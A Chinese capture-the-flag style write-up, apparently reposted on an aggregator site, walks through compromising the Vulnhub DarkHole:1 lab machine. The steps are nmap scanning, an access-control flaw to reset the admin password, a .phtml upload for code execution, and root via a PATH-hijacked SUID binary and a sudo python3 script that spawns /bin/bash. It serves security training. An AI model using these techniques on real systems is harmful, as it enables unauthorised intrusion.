Vulnhub: DarkHole:1靶机

这篇具有很好参考价值的文章主要介绍了Vulnhub: DarkHole:1靶机。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130

Vulnhub: DarkHole:1靶机

访问目标web网站,注册用户

Vulnhub: DarkHole:1靶机

注册时尝试注册用户名为admin的用户,发现存在该用户

Vulnhub: DarkHole:1靶机

Vulnhub: DarkHole:1靶机

进入用户后台,利用burp抓包越权修改其他用户的密码

Vulnhub: DarkHole:1靶机

Vulnhub: DarkHole:1靶机

admin用户密码被修改

Vulnhub: DarkHole:1靶机

经过测试,phtml后缀的文件可以上传并且被当成脚本执行

Vulnhub: DarkHole:1靶机

Vulnhub: DarkHole:1靶机

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

Vulnhub: DarkHole:1靶机

执行toto的同时会执行id命令

Vulnhub: DarkHole:1靶机

修改环境变量切换到john用户

echo '/bin/bash' > id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

Vulnhub: DarkHole:1靶机

在john用户家目录,发现password文件存放john用户的密码

Vulnhub: DarkHole:1靶机

查看john用户sudo权限

Vulnhub: DarkHole:1靶机

修改file.py提升为root

echo 'import os' > file.py
echo 'os.system("/bin/bash")' >> file.py
sudo -u root /usr/bin/python3 /home/john/file.py

Vulnhub: DarkHole:1靶机文章来源地址https://www.toymoban.com/news/detail-506123.html

到了这里,关于Vulnhub: DarkHole:1靶机的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • FAST路由器登陆地址192.168.1.1设置步骤

    想必每个人都知道,我们想要使用宽带路由器共享上网时,必须要对共享上网的电脑和宽带路由器进行设置,本篇以迅捷路由器给大家介绍如何设置共享上网。 一 、在硬件连接完成以后,需要有一台已经与宽带路由器的LAN口相连接的电脑来进行具体的设置,这台电脑必须安

    2024年02月05日
    浏览(45)
  • 192.168.1.253手机上打不开的解决办法

    本文介绍了192.168.1.253手机登录打不开解决办法,192.168.1.253是TP-Link、水星和迅捷等迷你无线路由器的设置地址;很多用户用手机设置迷你无线路由器时,手机上打不开192.168.1.253登录页面。 192.168.1.253手机登录打不开 一、手机连接到迷你路由器WiFi信号 迷你无线路由器,在出厂

    2024年02月08日
    浏览(44)
  • 192.168.1.1路由器概念介绍及设置问题解析

    对于新手朋友来说,都很想知道192.168.1.1或192.168.0.1究竟是什么?或是在路由器设置过程会遇到很多问题都不知道怎么解决,那么下面就为大家详细解答这两个问题,希望能帮助到大家。 192.168.1.1路由器设置之概念理解 初学者一看到192.168.1.1或192.168.0.1就很想知道他们究竟是什

    2024年02月06日
    浏览(40)
  • 办公室电脑群DNS出现问题,显示192.168.1.1

    (1)DNS会变为192.168.1.1 (2)交换机断电重启会变好,后面可能仍然出问题 (3)我tracert了一下提供的两个IP,其中一个就正常路由,一个失败。 在房间找到一个很小的那种魔方无线路由器,接入了网络,可能没有配置好。 (1)我昨天了解到的信息是告诉我只有插满的两个交

    2024年02月16日
    浏览(50)
  • 192.168.1.1打不开路由器无法进入管理界面

    192.168.1.1打不开路由器设置。刚买了一个无线路由器,插了网线,不知道为什么就是,打开电脑。想设置一下路由器。不知道为什么就是登陆不了,看到虽然现实链接上wifi,可是没有设置。是登陆不了的。下文就让小编跟大家介绍怎么排除192.168.1.1打不开的办法。 192.168.1.1打

    2024年02月07日
    浏览(40)
  • 192.168.1.1路由器进不去怎么办

    我们有时候发现电脑路由器登陆不了了,输入路由器的地址192.168.1.1无法访问,而是出现了域名解析错误(错误代码:105)这时候我们应该怎么办呢?小编根据自己的经验说一下路由器登陆不了的处理方法,希望对你有所帮助!本张图篇来自网络图片处理,版权归原作者所有!

    2024年02月07日
    浏览(43)
  • 解决192.168.1.1路由器进不去的故障

    192.168.1.1进不去的原因 当你访问http://www.routerlogin.net/welcome.htm或welcome.htm或http://192.168.1.1页时,浏览器提示:无法显示该页面,总结起来,导致192.168.1.1进不去问题的原因通常是以下几种: 1.用来设置路由器的电脑的TCP/IP属性设置有误; 2.设置路由器的电脑的TCP/IP设置无误,路

    2024年02月08日
    浏览(38)
  • 输入192.168.1.1却无法登陆路由器的解决办法

    有时候我们登陆路由器进行设置时,偶尔会遇到在IE浏览器地址栏输入192.168.1.1路由器地址,无法弹出用户名和密码对话框,针对此类路由器问题那如何解决呢? 1、检查电脑是否和LAN口(1,2,3,4口中任意一口)连好,路由器上对应的指示灯是否是亮的。 2、如果是拨号上网

    2024年02月05日
    浏览(45)
  • TP-LINK路由器192.168.1.253设置流程

    192.168.1.253 一般都是TP-LINK路由器,有些小伙伴不太会192.168.1.253 路由器设置。而且有的还打不开192.168.1.253这个页面。 这里小编就来为大家分享192.168.1.253 路由器设置流程。 192.168.1.253 路由器设置流程 1、先打开浏览器!然后在浏览器里面输入192.168.1.253! 按回车之后就会出现登

    2024年02月07日
    浏览(48)
  • 路由器选择192.168.1.1作为默认网关的3个原因

    我们每次设置无线路由器,大部分都会在浏览器输入192.168.1.1。那我们是否想过这样的问题额。为什么偏偏选择额192.168.1.1作为默认网关额? 今天小编就从一下3个方面来解释这个问题。 界面 1、历史层面 也就是在宽带遍布全球以前,无论是企业用还是家用网关用的最多的默认

    2024年02月06日
    浏览(48)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包